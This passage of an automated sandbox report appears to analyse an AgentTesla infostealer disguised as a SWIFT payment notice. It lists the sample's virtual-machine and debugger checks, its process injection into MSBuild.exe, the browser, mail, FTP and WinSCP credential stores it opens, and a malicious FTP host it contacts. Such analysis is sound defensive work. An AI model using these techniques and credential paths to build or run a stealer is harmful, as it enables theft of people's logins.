Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1196031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195919	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195380	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1195031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194700	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 1194265	Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2338417388.0000021D5F170000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: MSBuild.exe, 00000004.00000002.4520618390.000000000118F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllodeE
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: DAA008	Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe	Queries volume information: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\EUR Swift Bildirimi12-08-2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6536, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6536, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f96d960.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUR Swift Bildirimi12-08-2024.exe.21d6f9a7da8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4521867809.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUR Swift Bildirimi12-08-2024.exe PID: 7032, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6536, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Email Collection	12 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	151 Virtualization/Sandbox Evasion	21 Input Capture	1 Process Discovery	Remote Desktop Protocol	21 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	1 Credentials in Registry	151 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	11 Archive Collected Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	2 Data from Local System	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	1 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EUR Swift Bildirimi12-08-2024.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.AveMariaRAT
EUR Swift Bildirimi12-08-2024.exe	57%	Virustotal		Browse
EUR Swift Bildirimi12-08-2024.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
ftp.normagroup.com.tr	10%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://ftp.normagroup.com.tr	0%	Avira URL Cloud	safe
http://ftp.normagroup.com.tr	10%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
ftp.normagroup.com.tr	104.247.165.99	true	true	10%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ftp.normagroup.com.tr	MSBuild.exe, 00000004.00000002.4521867809.0000000002F73000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4521867809.000000000308E000.00000004.00000800.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.8.dr	false	URL Reputation: safe	unknown
https://account.dyn.com/	EUR Swift Bildirimi12-08-2024.exe, 00000000.00000002.2339874172.0000021D6F933000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4519630330.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000004.00000002.4521867809.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.247.165.99	ftp.normagroup.com.tr	United States		8100	ASN-QUADRANET-GLOBALUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1494560
Start date and time:	2024-08-18 18:27:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EUR Swift Bildirimi12-08-2024.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@9/5@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 75% Number of executed functions: 62 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 40.126.32.68, 40.126.32.138, 20.190.160.17, 20.190.160.22, 40.126.32.140, 40.126.32.74, 40.126.32.72, 40.126.32.76, 2.16.100.168, 88.221.110.91, 192.229.221.95, 52.165.165.26, 52.165.164.15, 13.85.23.206, 20.189.173.22, 20.3.187.198, 199.232.210.172
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ctldl.windowsupdate.com.delivery.microsoft.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, login.msa.msidentity.com, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:28:06	API Interceptor	11048522x Sleep call for process: MSBuild.exe modified
12:28:25	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.247.165.99	LisectAVT_2403002A_134.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi_____.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi__.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-01-pdf.exe	Get hash	malicious	AgentTesla	Browse
	19-03-2024_Takas_Sonuclari.exe	Get hash	malicious	AgentTesla	Browse
	CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-14-06-2024.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi01.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	INV-PA0008142024002.xla.xlsx	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	Vidar	Browse	199.232.210.172
	http://beonlineboo.com	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://mohamed77765000.github.io/Ph000098/	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://id-login-992xr6nc98336.codeanyapp.com/netflix-updat/70c046d8bdef2e595efd11beb15219ee	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	http://office-live-com.pagedemo.co/	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://pub-8510546161864916b3667903487d9860.r2.dev/index.html	Get hash	malicious	Unknown	Browse	199.232.210.172
	http://pub-ee199fb6eeb24e078bbe948f199a2302.r2.dev/index.html	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://login.ours-project.workers.dev/v3/security	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://toqdfcc6j.indylatinawrds.com:8443/impact?impact=c...j..@b..**.com	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	Payment Advice - Advice RefGLV626201911]Priority payment Customer_PDF_.exe	Get hash	malicious	FormBook	Browse	192.229.221.95
	neverlose.exe	Get hash	malicious	Discord Token Stealer	Browse	192.229.221.95
	SecuriteInfo.com.Win32.DropperX-gen.5758.19067.exe	Get hash	malicious	LummaC	Browse	192.229.221.95
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	192.229.221.95
